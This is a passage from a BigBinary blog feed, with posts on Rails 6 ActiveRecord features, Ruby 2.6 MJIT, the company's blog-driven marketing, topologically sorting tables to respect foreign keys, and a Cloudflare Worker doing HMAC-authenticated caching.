=&gt; {&quot;adapter&quot;=&gt;&quot;sqlite3&quot;, &quot;pool&quot;=&gt;5, &quot;timeout&quot;=&gt;5000, &quot;database&quot;=&gt;&quot;db/development.sqlite3&quot;}

&gt;&gt; ActiveRecord::Base.configurations.configs_for(env_name: &quot;development&quot;)
=&gt; [#&lt;ActiveRecord::DatabaseConfigurations::HashConfig:0x00007fc18274f680 @env_name=&quot;development&quot;, @spec_name=&quot;primary&quot;, @config={&quot;adapter&quot;=&gt;&quot;sqlite3&quot;, &quot;pool&quot;=&gt;5, &quot;timeout&quot;=&gt;5000, &quot;database&quot;=&gt;&quot;db/development.sqlite3&quot;}&gt;]</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/pull/33637">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 shows unpermitted params in logs in color]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-shows-unpermitted-params-in-logs-in-color"/>
      <updated>2019-03-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-shows-unpermitted-params-in-logs-in-color</id>
      <content type="html"><![CDATA[<p>Strong parameters allow us to control the user input in our Rails app. In the development environment, the unpermitted parameters are shown in the log as follows.</p><p><img src="/blog_images/2019/rails-6-shows-unpermitted-params-in-logs-in-color/before.png" alt="Unpermitted params before Rails 6"></p><p>It is easy to miss this message in the flurry of other messages.</p><p>Rails 6 has added a change to <a href="https://github.com/rails/rails/pull/34617">show these params in red</a> for better visibility.</p><p><img src="/blog_images/2019/rails-6-shows-unpermitted-params-in-logs-in-color/after.png" alt="Unpermitted params after Rails 6"></p>]]></content>
    </entry><entry>
       <title><![CDATA[Marketing strategy at BigBinary]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/marketing-strategy-at-bigbinary"/>
      <updated>2019-03-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/marketing-strategy-at-bigbinary</id>
      <content type="html"><![CDATA[<p>BigBinary started in 2011. Here are our revenue numbers for the last 7 years.</p><p><img src="/blog_images/2019/marketing-strategy-at-bigbinary/revenue.png" alt="BigBinary revenue"></p><p>We achieved this to date without any outbound marketing or sales strategy.</p><ul><li>We have never sent a cold email.</li><li>We have never sent a cold LinkedIn message.</li><li>The only time we advertised was a period of two months when we tried Google advertisements, with no results.</li><li>We do not sponsor any podcast.</li><li>We have never had a salesperson.</li><li>We have never had a marketing person.</li></ul><p>We have kept our heads down and have focused on what we do best: designing, developing, debugging, devops, and blogging.</p><p>This is what has worked for us so far:</p><ul><li>We contribute to the community through <a href="https://blog.bigbinary.com">blog posts</a> and open source.</li><li>We sponsor community events like Rails Girls and Ruby Conf India.</li><li>We sponsor many React and Ruby meetups.</li><li>We focus on keeping our existing clients happy.</li></ul><p>Over the years I have come across many people who aspire to be freelancers. While it is not for everyone, I encourage them to give freelancing a try.</p><p>The greatest hindrance I have seen is that they stress over sales and marketing, and rightly so. Being a freelancer means a constant need to find your next client.</p><p>I'm not here to say what others ought to do. I'm here to say what has worked for BigBinary over the last 7 years.</p><p>While we plan to experiment with new forms of marketing, networking, and sales channels as we grow, these are not the end-all-be-all for freelancers. While marketing, networking, and sales may be effective for some, they were not how we started BigBinary and may not be how you want to start either.</p><p>For us at BigBinary, it has been writing blogs. 
When we come across a potentially intriguing blog topic, we save it by creating a GitHub issue. When we have downtime, we pick up a topic from our issues list. It's as simple as that, and it has been our primary driver of growth thus far.</p><p>While you should experiment to find out what works best for you, you also need to find what suits your personality. If you are good at teaching through videos, consider creating your own YouTube channel. If you contribute to open source, try blogging about your efforts and learnings. If you are good at concentrating on a niche technology, build your marketing and business around that.</p><p>I can confidently say that the majority of people I have met who want to be freelancers would do fine if they simply shared what they are learning. Most of these people do technical work. Some of them already blog, and the others could. Nearly everybody will say that a blog is a decent start. I'm saying that it is a good end too.</p><p>If you do not want to do any other form of marketing, that's fine too. Just blogging will work out fine for you, just like it has worked out fine for us at BigBinary.</p><p>Just because you are going to be a freelancer, you don't have to change who you are. If you don't like sending cold emails, then don't. If you do not like networking, that's alright as well. Write personal emails, dump corporate talk, show compassion, and be genuine.</p><p>So go on and do some freelancing. It will teach you a lot about software development, business, life, managing money, creating value, and capturing value. It will be rough at times, and it will be hard at times. But it will also be a ton of fun.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds ActiveRecord::Relation#delete_by and ActiveRecord::Relation#destroy_by]]></title>
       <author><name>Abhay Nikam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-activerecord-relation-delete_by-and-activerecord-relation-destroy_by"/>
      <updated>2019-03-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-activerecord-relation-delete_by-and-activerecord-relation-destroy_by</id>
      <content type="html"><![CDATA[<p>As described by DHH in <a href="https://github.com/rails/rails/issues/35304">the issue</a>, Rails has <code>find_or_create_by</code>, <code>find_by</code> and similar methods to create and find records matching the specified conditions. Rails was missing a similar feature for deleting/destroying records.</p><p>Before Rails 6, deleting/destroying the record(s) matching a given condition was done as shown below.</p><pre><code class="language-ruby"># Example to destroy all authors matching the given condition
Author.find_by(email: &quot;abhay@example.com&quot;).destroy
Author.where(email: &quot;abhay@example.com&quot;, rating: 4).destroy_all

# Example to delete all authors matching the given condition
Author.find_by(email: &quot;abhay@example.com&quot;).delete
Author.where(email: &quot;abhay@example.com&quot;, rating: 4).delete_all</code></pre><p>The above examples lacked the symmetry of the <code>find_or_create_by</code> and <code>find_by</code> methods.</p><p>In Rails 6, the new <code>delete_by</code> and <code>destroy_by</code> methods have been added as ActiveRecord::Relation methods. <code>ActiveRecord::Relation#delete_by</code> is short-hand for <code>relation.where(conditions).delete_all</code>.
Similarly, <code>ActiveRecord::Relation#destroy_by</code> is short-hand for <code>relation.where(conditions).destroy_all</code>.</p><p>Here is how it can be used.</p><pre><code class="language-ruby"># Example to destroy all authors matching the given condition using destroy_by
Author.destroy_by(email: &quot;abhay@example.com&quot;)
Author.destroy_by(email: &quot;abhay@example.com&quot;, rating: 4)

# Example to delete all authors matching the given condition using delete_by
Author.delete_by(email: &quot;abhay@example.com&quot;)
Author.delete_by(email: &quot;abhay@example.com&quot;, rating: 4)</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/35316">pull request</a> for more details on this.</p>]]></content>
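The shorthand relationship can be pictured with a toy relation class. This is a plain-Ruby sketch, not ActiveRecord's implementation; `ToyRelation` and its in-memory records are illustrative only:

```ruby
# Toy illustration (NOT ActiveRecord): delete_by(conditions) is simply
# where(conditions).delete_all composed into one call.
class ToyRelation
  def initialize(records)
    @records = records
  end

  # Keep only the records matching every key/value pair in conditions.
  def where(conditions)
    ToyRelation.new(@records.select { |r| conditions.all? { |key, value| r[key] == value } })
  end

  # Remove every record in this relation and return the count,
  # mirroring delete_all's return value.
  def delete_all
    count = @records.size
    @records.clear
    count
  end

  # The Rails 6 shorthand, expressed via the two calls above.
  def delete_by(conditions)
    where(conditions).delete_all
  end
end

authors = ToyRelation.new([
  { email: "abhay@example.com", rating: 4 },
  { email: "sam@example.com",   rating: 5 }
])
authors.delete_by(email: "abhay@example.com") # => 1
```

One behavioral difference worth remembering when choosing between the real methods: `delete_by` issues a single SQL DELETE and skips callbacks, while `destroy_by` instantiates each matching record and runs its destroy callbacks.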
    </entry><entry>
       <title><![CDATA[Rails 6 adds ActiveRecord::Relation#touch_all]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-activerecord-relation-touch-all"/>
      <updated>2019-03-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-activerecord-relation-touch-all</id>
      <content type="html"><![CDATA[<p>Before moving forward, we need to understand what the <a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/Persistence.html#method-i-touch">touch</a> method does. <a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/Persistence.html#method-i-touch">touch</a> is used to update the <code>updated_at</code> timestamp, which defaults to the current time. It also accepts a custom time or additional columns as parameters.</p><p>Rails 6 has added <a href="https://github.com/rails/rails/pull/31513">touch_all</a> on ActiveRecord::Relation to touch multiple records in one go. Before Rails 6, we needed to iterate over all the records using an iterator to achieve this result.</p><p>Let's take an example in which we call <a href="https://github.com/rails/rails/pull/31513">touch_all</a> on all user records.</p><h4>Rails 5.2</h4><pre><code class="language-ruby">&gt;&gt; User.count
SELECT COUNT(*) FROM &quot;users&quot;
=&gt; 3

&gt;&gt; User.all.touch_all
=&gt; Traceback (most recent call last):
        1: from (irb):2
NoMethodError (undefined method 'touch_all' for #&lt;User::ActiveRecord_Relation:0x00007fe6261f9c58&gt;)

&gt;&gt; User.all.each(&amp;:touch)
SELECT &quot;users&quot;.* FROM &quot;users&quot;
begin transaction
  UPDATE &quot;users&quot; SET &quot;updated_at&quot; = ? WHERE &quot;users&quot;.&quot;id&quot; = ?  [[&quot;updated_at&quot;, &quot;2019-03-05 17:45:51.495203&quot;], [&quot;id&quot;, 1]]
commit transaction
begin transaction
  UPDATE &quot;users&quot; SET &quot;updated_at&quot; = ? WHERE &quot;users&quot;.&quot;id&quot; = ?  [[&quot;updated_at&quot;, &quot;2019-03-05 17:45:51.503415&quot;], [&quot;id&quot;, 2]]
commit transaction
begin transaction
  UPDATE &quot;users&quot; SET &quot;updated_at&quot; = ? WHERE &quot;users&quot;.&quot;id&quot; = ?  [[&quot;updated_at&quot;, &quot;2019-03-05 17:45:51.509058&quot;], [&quot;id&quot;, 3]]
commit transaction
=&gt; [#&lt;User id: 1, name: &quot;Sam&quot;, created_at: &quot;2019-03-05 16:09:29&quot;, updated_at: &quot;2019-03-05 17:45:51&quot;&gt;, #&lt;User id: 2, name: &quot;John&quot;, created_at: &quot;2019-03-05 16:09:43&quot;, updated_at: &quot;2019-03-05 17:45:51&quot;&gt;, #&lt;User id: 3, name: &quot;Mark&quot;, created_at: &quot;2019-03-05 16:09:45&quot;, updated_at: &quot;2019-03-05 17:45:51&quot;&gt;]</code></pre><h4>Rails 6.0.0.beta2</h4><pre><code class="language-ruby">&gt;&gt; User.count
SELECT COUNT(*) FROM &quot;users&quot;
=&gt; 3

&gt;&gt; User.all.touch_all
UPDATE &quot;users&quot; SET &quot;updated_at&quot; = ?  [[&quot;updated_at&quot;, &quot;2019-03-05 16:08:47.490507&quot;]]
=&gt; 3</code></pre><p><a href="https://github.com/rails/rails/pull/31513">touch_all</a> returns the count of the records on which it is called.</p><p><a href="https://github.com/rails/rails/pull/31513">touch_all</a> also takes a custom time or different columns as parameters.</p><h4>Rails 6.0.0.beta2</h4><pre><code class="language-ruby">&gt;&gt; User.count
SELECT COUNT(*) FROM &quot;users&quot;
=&gt; 3

&gt;&gt; User.all.touch_all(time: Time.new(2019, 3, 2, 1, 0, 0))
UPDATE &quot;users&quot; SET &quot;updated_at&quot; = ?  [[&quot;updated_at&quot;, &quot;2019-03-02 00:00:00&quot;]]
=&gt; 3

&gt;&gt; User.all.touch_all(:created_at)
UPDATE &quot;users&quot; SET &quot;updated_at&quot; = ?, &quot;created_at&quot; = ?  [[&quot;updated_at&quot;, &quot;2019-03-05 17:55:41.828347&quot;], [&quot;created_at&quot;, &quot;2019-03-05 17:55:41.828347&quot;]]
=&gt; 3</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/pull/31513">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds negative scopes on enum]]></title>
       <author><name>Abhay Nikam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-negative-scopes-on-enum"/>
      <updated>2019-03-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-negative-scopes-on-enum</id>
      <content type="html"><![CDATA[<p>When an enum attribute is defined on a model, Rails adds some default scopes to filter records based on the values of the enum field.</p><p>Here is how an enum scope can be used.</p><pre><code class="language-ruby">class Post &lt; ActiveRecord::Base
  enum status: %i[drafted active trashed]
end

Post.drafted # =&gt; where(status: :drafted)
Post.active  # =&gt; where(status: :active)</code></pre><p>In Rails 6, negative scopes are added for the enum values.</p><p>As mentioned by DHH in the pull request,</p><blockquote><p>these negative scopes are convenient when you want to disallow access in controllers</p></blockquote><p>Here is how they can be used.</p><pre><code class="language-ruby">class Post &lt; ActiveRecord::Base
  enum status: %i[drafted active trashed]
end

Post.not_drafted # =&gt; where.not(status: :drafted)
Post.not_active  # =&gt; where.not(status: :active)</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/35381">pull request</a> for more details on this.</p>]]></content>
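Conceptually, Rails metaprograms one positive and one negative scope per enum value. Here is a plain-Ruby toy sketch of that idea (an illustration only: `ToyModel` and its array-backed `all` are made up, and real Rails scopes return relations, not arrays):

```ruby
# Toy sketch of enum scope generation (NOT Rails' real implementation).
class ToyModel
  def self.enum(definitions)
    definitions.each do |attribute, values|
      values.each do |value|
        # Positive scope, e.g. Post.drafted => records where status == :drafted
        define_singleton_method(value) do
          all.select { |record| record[attribute] == value }
        end
        # Rails 6's negative scope, e.g. Post.not_drafted => status != :drafted
        define_singleton_method("not_#{value}") do
          all.reject { |record| record[attribute] == value }
        end
      end
    end
  end

  # In-memory stand-in for the table.
  def self.all
    @all ||= []
  end
end

class Post < ToyModel
  enum status: %i[drafted active trashed]
end

Post.all << { status: :drafted } << { status: :active }
Post.not_drafted # => [{ status: :active }]
```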
    </entry><entry>
       <title><![CDATA[MJIT Support in Ruby 2.6]]></title>
       <author><name>Sudeep Tarlekar</name></author>
      <link href="https://www.bigbinary.com/blog/mjit-support-in-ruby-2-6"/>
      <updated>2019-03-05T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/mjit-support-in-ruby-2-6</id>
      <content type="html"><![CDATA[<h3>What is JIT?</h3><p>JIT stands for Just-In-Time compiler. A JIT compiler translates frequently executed code into native machine code at runtime, which the processor can then run directly, saving time by not interpreting the same piece of code over and over.</p><h3>Ruby 2.6</h3><p>MJIT was introduced in Ruby 2.6. It is most commonly known as MRI JIT or Method-Based JIT.</p><p>It is a part of the Ruby 3x3 project started by Matz. The name &quot;Ruby 3x3&quot; signifies that Ruby 3.0 will be 3 times faster than Ruby 2.0, with a main focus on performance. In addition to performance, the project also aims for the following things:</p><ol><li>Portability</li><li>Stability</li><li>Security</li></ol><p>MJIT is still in development, therefore it is optional in Ruby 2.6. If you are running Ruby 2.6, you can execute the following command.</p><pre><code class="language-shell">ruby --help</code></pre><p>You will see the following options.</p><pre><code class="language-shell">--jit-wait          # Wait program execution until code compiles.
--jit-verbose=num   # Level of information the MJIT compiler prints for the Ruby program.
--jit-min-calls=num # Minimum number of calls after which MJIT should kick in.
--jit-max-cache=num # Maximum number of methods to keep in the JIT cache.
--jit-save-temps    # Save the compiled library to a file.</code></pre><p>Vladimir Makarov proposed improving performance by replacing VM instructions with RTL (Register Transfer Language) and introducing the method-based JIT compiler.</p><p>Vladimir explained the MJIT architecture in his <a href="https://youtu.be/qpZDw-p9yag?t=1655">RubyKaigi 2017 conference keynote</a>.</p><p>Ruby's compiler converts the code to YARV (Yet Another Ruby VM) instructions, and these instructions are then run by the Ruby Virtual Machine. Code that is executed too often is converted to RTL instructions, which run faster.</p><p>Let's take a look at how MJIT works.</p><pre><code class="language-ruby"># mjit.rb
require 'benchmark'
puts Benchmark.measure {
  def test_while
    start_time = Time.now
    i = 0
    while i &lt; 4
      i += 1
    end
    puts &quot;Time taken is #{Time.now - start_time}&quot;
  end
  4.times { test_while }
}</code></pre><p>Let's run this code with the MJIT options and check what we get.</p><pre><code class="language-shell">ruby --jit --jit-verbose=1 --jit-wait --disable-gems mjit.rb</code></pre><pre><code class="language-shell">Time taken is 4.0e-06
Time taken is 0.0
Time taken is 0.0
Time taken is 0.0
  0.000082   0.000032   0.000114 (  0.000105)
Successful MJIT finish</code></pre><p>Nothing interesting, right? Why is that? Because we call the method only 4 times, and the default number of calls before MJIT kicks in is 5. We can decide after how many calls MJIT should kick in by providing the <code>--jit-min-calls=num</code> option.</p><p>Let's tweak the program a bit so MJIT gets to work.</p><pre><code class="language-ruby">require 'benchmark'
puts Benchmark.measure {
  def test_while
    start_time = Time.now
    i = 0
    while i &lt; 4_00_00_000
      i += 1
    end
    puts &quot;Time taken is #{Time.now - start_time}&quot;
  end
  10.times { test_while }
}</code></pre><p>After running the above code we can see some work done by MJIT.</p><pre><code class="language-shell">Time taken is 0.457916
Time taken is 0.455921
Time taken is 0.454672
Time taken is 0.452823
JIT success (72.5ms): block (2 levels) in &lt;main&gt;@mjit.rb:15 -&gt; /var/folders/v6/_6sh53vn5gl3lct18w533gr80000gn/T//_ruby_mjit_p66220u0.c
JIT success (140.9ms): test_while@mjit.rb:4 -&gt; /var/folders/v6/_6sh53vn5gl3lct18w533gr80000gn/T//_ruby_mjit_p66220u1.c
JIT compaction (23.0ms): Compacted 2 methods -&gt; /var/folders/v6/_6sh53vn5gl3lct18w533gr80000gn/T//_ruby_mjit_p66220u2.bundle
Time taken is 0.463703
Time taken is 0.102852
Time taken is 0.103335
Time taken is 0.103299
Time taken is 0.103252
Time taken is 0.103261
  2.797843   0.005357   3.141944 (  2.801391)
Successful MJIT finish</code></pre><p>Here's what's happening. The method ran 4 times, and on the 5th call MJIT found that it was running the same code again. So MJIT started a separate thread to convert the code into RTL instructions, which produced a shared object library. Subsequent calls then executed that compiled code directly. Because we passed the <code>--jit-verbose=1</code> option, we can see what MJIT did.</p><p>What we are seeing in the output is the following:</p><ol><li>Time taken to compile.</li><li>Which block of code was compiled by JIT.</li><li>Location of the compiled code.</li></ol><p>We can open those files and see how MJIT converted the piece of code to binary instructions, but for that we need to pass another option, <code>--jit-save-temps</code>, and then inspect the saved files.</p><p>After the code was compiled to RTL instructions, take a look at the execution time. It dropped from about 0.46 seconds to 0.10 seconds. That's a neat speed bump.</p><p>Here is a comparison across some of the Ruby versions for some basic operations.</p><p><img src="/blog_images/imageruby_mjit_execution_comparison.png" alt="Ruby time comparison in different versions"></p><h2>Rails comparison on Ruby 2.5, Ruby 2.6 and Ruby 2.6 with JIT</h2><p>Create a Rails application with different Ruby versions and start a server. We can start the Rails server with the JIT option, as shown below.</p><pre><code class="language-shell">RUBYOPT=&quot;--jit&quot; bundle exec rails s</code></pre><p>Now, we can start testing the performance on the servers. We found that Ruby 2.6 is faster than Ruby 2.5, but enabling JIT in Ruby 2.6 does not add more value to the Rails application.</p><h2>MJIT status and future directions</h2><ul><li>It is in an early development stage.</li><li>Does not work on Windows.</li><li>Needs more time to mature.</li><li>Needs more optimisations.</li><li>MJIT may use GCC or LLVM C compilers in the future.</li></ul><h2>Further reading</h2><ol><li><a href="https://developers.redhat.com/blog/2018/03/22/ruby-3x3-performance-goal">Ruby 3x3 Performance Goal</a></li><li><a href="https://medium.com/@k0kubun/the-method-jit-compiler-for-ruby-2-6-388ee0989c13">The method JIT compiler for Ruby 2.6</a></li><li><a href="https://github.com/vnmakarov/ruby/tree/rtl_mjit_branch">Vladimir Makarov's Ruby Edition</a></li></ol>]]></content>
    </entry><entry>
       <title><![CDATA[Resolve foreign key constraint conflict]]></title>
       <author><name>Narendra Rajput</name></author>
      <link href="https://www.bigbinary.com/blog/resolve-foreign-key-constraint-conflict-while-copying-data-using-topological-sort"/>
      <updated>2019-02-05T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/resolve-foreign-key-constraint-conflict-while-copying-data-using-topological-sort</id>
      <content type="html"><![CDATA[<p>We have a client that uses a multi-tenant database setup where each database holds the data for one of their customers. Whenever a new customer is added, a service dynamically creates a new database. In order to seed this new database, we were tasked with implementing a feature to copy data from an existing &quot;demo&quot; database.</p><p>The &quot;demo&quot; database is actually a live client database where the sales team does demos. This ensures that the data that is copied is fresh and not stale.</p><p>We implemented a solution where we simply listed all the tables in the namespace and used <a href="https://github.com/zdennis/activerecord-import">activerecord-import</a> to copy the table data. We used the <code>activerecord-import</code> gem to keep the code agnostic of the underlying database, because we use different databases in development and production: production runs &quot;SQL Server&quot; while development uses &quot;PostgreSQL&quot;. Why this project ended up with different databases in development and production is worthy of a separate blog post.</p><p>When we started using the above-mentioned strategy, we quickly ran into a problem: inserts for some tables were failing.</p><pre><code class="language-plaintext">insert or update on table &quot;dependent_table&quot; violates foreign key constraint &quot;fk_rails&quot;
Detail: Key (column)=(1) is not present in table &quot;main_table&quot;.</code></pre><p>The issue was that we had foreign key constraints on some tables, and the &quot;dependent&quot; table was being processed before the &quot;main&quot; table.</p><p>Initially we thought of simply hard-coding the sequence in which to process the tables, but that would mean updating the service whenever a new table is added. So we needed a way to identify the foreign key dependencies and determine the sequence in which to copy the tables at runtime.
To resolve this issue, we thought of using <a href="https://en.wikipedia.org/wiki/Topological_sorting">Topological Sorting</a>.</p><h2>Topological Sorting</h2><p>To get started, we need the list of dependencies between the &quot;main&quot; and &quot;dependent&quot; tables. In PostgreSQL, this SQL query fetches the table dependencies.</p><pre><code class="language-sql">SELECT
    tc.table_name AS dependent_table,
    ccu.table_name AS main_table
FROM
    information_schema.table_constraints AS tc
    JOIN information_schema.key_column_usage AS kcu
      ON tc.constraint_name = kcu.constraint_name
      AND tc.table_schema = kcu.table_schema
    JOIN information_schema.constraint_column_usage AS ccu
      ON ccu.constraint_name = tc.constraint_name
      AND ccu.table_schema = tc.table_schema
WHERE constraint_type = 'FOREIGN KEY'
  AND (tc.table_name LIKE 'namespace_%' OR ccu.table_name LIKE 'namespace_%');

=&gt; dependent_table  | main_table
   -----------------------------
   dependent_table1 | main_table1
   dependent_table2 | main_table2</code></pre><p>The above query fetches the dependencies for only the tables that have the namespace prefix, i.e. the tables we are interested in. Its output was <code>[[dependent_table1, main_table1], [dependent_table2, main_table2]]</code>.</p><p>Ruby's standard library has a <code>TSort</code> module for implementing topological sorts, so we needed to run the topological sort on these dependencies. We inserted the dependencies into a hash and included the <code>TSort</code> functionality into the hash.
Following is the way to include the <code>TSort</code> module into a hash by subclassing <code>Hash</code>.</p><pre><code class="language-ruby">require &quot;tsort&quot;

class TsortableHash &lt; Hash
  include TSort

  alias tsort_each_node each_key

  def tsort_each_child(node, &amp;block)
    fetch(node).each(&amp;block)
  end
end

# Borrowed from https://www.viget.com/articles/dependency-sorting-in-ruby-with-tsort/</code></pre><p>Then we simply added all the tables to the dependency hash, as below.</p><pre><code class="language-ruby">tables_to_sort = [&quot;dependent_table1&quot;, &quot;dependent_table2&quot;, &quot;main_table1&quot;]
dependency_graph = tables_to_sort.inject(TsortableHash.new) { |hash, table| hash[table] = []; hash }

table_dependency_map = fetch_table_dependencies_from_database
=&gt; [[&quot;dependent_table1&quot;, &quot;main_table1&quot;], [&quot;dependent_table2&quot;, &quot;main_table2&quot;]]

# Add missing tables to the dependency graph
table_dependency_map.flatten.each { |table| dependency_graph[table] ||= [] }
table_dependency_map.each { |constraint| dependency_graph[constraint[0]] &lt;&lt; constraint[1] }

dependency_graph.tsort
=&gt; [&quot;main_table1&quot;, &quot;dependent_table1&quot;, &quot;main_table2&quot;, &quot;dependent_table2&quot;]</code></pre><p>The output above is the dependency-resolved sequence of tables.</p><p>Topological sorting is pretty useful in situations where we need to resolve dependencies, and Ruby provides a really helpful tool, <code>TSort</code>, to implement it without going into the implementation details. Although I did spend time understanding the underlying algorithm, for fun.</p>]]></content>
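One caveat with this approach: if two tables reference each other through circular foreign keys, `tsort` raises `TSort::Cyclic`. A self-contained sketch using the same `TsortableHash` pattern shows both the happy path and the cycle case (table names here are placeholders):

```ruby
require "tsort"

# Same pattern as in the post: a Hash whose keys are tables and whose
# values are arrays of the tables they depend on.
class TsortableHash < Hash
  include TSort

  alias tsort_each_node each_key

  def tsort_each_child(node, &block)
    fetch(node).each(&block)
  end
end

graph = TsortableHash.new
graph["dependent_table"] = ["main_table"]
graph["main_table"]      = []
graph.tsort # => ["main_table", "dependent_table"]

# Circular foreign keys surface as TSort::Cyclic at sort time.
cyclic = TsortableHash.new
cyclic["a"] = ["b"]
cyclic["b"] = ["a"]
begin
  cyclic.tsort
rescue TSort::Cyclic => e
  # Break the cycle here, e.g. copy without the FK column and backfill later;
  # e.message names the tables involved.
end
```

Detecting the cycle up front is cheaper than discovering it via a failed insert halfway through a copy.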
    </entry><entry>
       <title><![CDATA[Cache all files with Cloudflare worker and HMAC auth]]></title>
       <author><name>Ershad Kunnakkadan</name></author>
      <link href="https://www.bigbinary.com/blog/how-to-cache-all-files-using-cloudflare-worker-along-with-hmac-authentication"/>
      <updated>2019-01-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-to-cache-all-files-using-cloudflare-worker-along-with-hmac-authentication</id>
      <content type="html"><![CDATA[<p><a href="https://www.cloudflare.com/">Cloudflare</a> is a Content Delivery Network (CDN) company that provides various network and security services. In March 2018, they <a href="https://blog.cloudflare.com/introducing-cloudflare-workers/">released</a> the &quot;Cloudflare Workers&quot; feature to the public. Cloudflare Workers allow us to write JavaScript code and run it on Cloudflare's edge servers. This is helpful when we want to pre-process requests before forwarding them to the origin. In this post, we will explain how we implemented <a href="https://en.wikipedia.org/wiki/HMAC">HMAC authentication</a> while caching all files on Cloudflare edges.</p><p>We have a bunch of files hosted in S3 which are served through CloudFront. To reduce the CloudFront bandwidth cost and to make use of a global CDN (we use <code>Price Class 100</code> in CloudFront), we decided to use Cloudflare for file downloads. This helps us cache files on Cloudflare edges and eventually reduces the bandwidth costs at the origin (CloudFront). But to do this, we had to solve a few problems.</p><p>We had been signing CloudFront download URLs to restrict their usage after a period of time. This means the file download URLs are always unique. Since Cloudflare caches files based on URLs, caching will not work when the URLs are signed. We had to remove the URL signing to get it working with Cloudflare, but we can't allow people to continuously use the same download URL. Cloudflare Workers helped us with this.</p><p>We negotiated a deal with Cloudflare and upgraded our subscription to the Enterprise plan. The Enterprise plan lets us define a <a href="https://developers.cloudflare.com/workers/reference/cloudflare-features/">Custom Cache Key</a>, so we can configure Cloudflare to cache based on a user-defined key. The Enterprise plan also increased the cache file size limits.
We wrote the following Worker code, which configures a custom cache key and authenticates URLs using HMAC.</p><p>A Cloudflare Worker starts by attaching a handler to the <code>&quot;fetch&quot;</code> event.</p><pre><code class="language-javascript">addEventListener(&quot;fetch&quot;, event =&gt; {
  event.respondWith(verifyAndCache(event.request));
});</code></pre><p>The <code>verifyAndCache</code> function can be defined as follows.</p><pre><code class="language-javascript">async function verifyAndCache(request) {
  /**
  source:
  https://jameshfisher.com/2017/10/31/web-cryptography-api-hmac.html
  https://github.com/diafygi/webcrypto-amples#hmac-verify
  https://stackoverflow.com/questions/17191945/conversion-between-utf-8-arraybuffer-and-string
  **/

  // Convert the string to an array of its ASCII values
  function str2ab(str) {
    let uintArray = new Uint8Array(
      str.split(&quot;&quot;).map(function (char) {
        return char.charCodeAt(0);
      })
    );
    return uintArray;
  }

  // Retrieve the token from the query string; it is in the format &quot;&lt;time&gt;-&lt;auth_code&gt;&quot;
  function getFullToken(url, query_string_key) {
    let full_token = url.split(query_string_key)[1];
    return full_token;
  }

  // Fetch the authentication code from the token
  function getAuthCode(full_token) {
    let token = full_token.split(&quot;-&quot;);
    return token[1].split(&quot;/&quot;)[0];
  }

  // Fetch the timestamp from the token
  function getExpiryTimestamp(full_token) {
    let timestamp = full_token.split(&quot;-&quot;);
    return timestamp[0];
  }

  // Fetch the file path from the URL
  function getFilePath(url) {
    let url_obj = new URL(url);
    return decodeURI(url_obj.pathname);
  }

  const full_token = getFullToken(request.url, &quot;&amp;verify=&quot;);
  const token = getAuthCode(full_token);
  const str =
    getFilePath(encodeURI(request.url)) + &quot;/&quot; + getExpiryTimestamp(full_token);
  const secret = &quot;&lt; HMAC KEY &gt;&quot;;

  // Import the secret string as an HMAC SHA-256 key
  let key = await crypto.subtle.importKey(
    &quot;raw&quot;,
    str2ab(secret),
    { name: &quot;HMAC&quot;, hash: { name: &quot;SHA-256&quot; } },
    false,
    [&quot;sign&quot;, &quot;verify&quot;]
  );

  // Sign the &quot;str&quot; with the key generated previously
  let sig = await crypto.subtle.sign({ name: &quot;HMAC&quot; }, key, str2ab(str));

  // Convert the ArrayBuffer &quot;sig&quot; to a string, then to a Base64 digest, and then URL-encode it
  let verif = encodeURIComponent(
    btoa(String.fromCharCode.apply(null, new Uint8Array(sig)))
  );

  // Get the current time as a Unix epoch
  let time = Math.floor(Date.now() / 1000);

  if (time &gt; getExpiryTimestamp(full_token) || verif != token) {
    // Render an error response
    const init = {
      status: 403,
    };
    const modifiedResponse = new Response(`Invalid token`, init);
    return modifiedResponse;
  } else {
    let url = new URL(request.url);
    // Generate a cache key from the URL, excluding the unique query string
    let cache_key = url.host + url.pathname;
    let headers = new Headers(request.headers);
    /**
    Set an optional header/auth token for additional security at the origin.
    For example, using AWS Web Application Firewall (WAF), it is possible to create a filter
    that allows only requests with a custom header to pass through the CloudFront distribution.
    **/
    headers.set(&quot;X-Auth-token&quot;, &quot;&lt; Optional Auth Token &gt;&quot;);
    /**
    Fetch the file using cache_key. The file will be served from the cache if it's already there,
    or the request will be sent to the origin. Please note 'cacheKey' is available only in the
    Enterprise plan.
    **/
    const response = await fetch(request, {
      cf: { cacheKey: cache_key },
      headers: headers,
    });
    return response;
  }
}</code></pre><p>Once the worker is added, configure an associated route under <code>&quot;Workers -&gt; Routes -&gt; Add Route&quot;</code> in Cloudflare.</p><p><img src="/blog_images/2019/how-to-cache-all-files-using-cloudflare-worker-along-with-hmac-authentication/cloudflare-add-worker-route.png" alt="Add Cloudflare Worker route"></p><p>Now, all requests will go through the configured Cloudflare worker. Each request will be verified using HMAC authentication, and all files will be cached on Cloudflare edges. This reduces bandwidth costs at the origin.</p>]]></content>
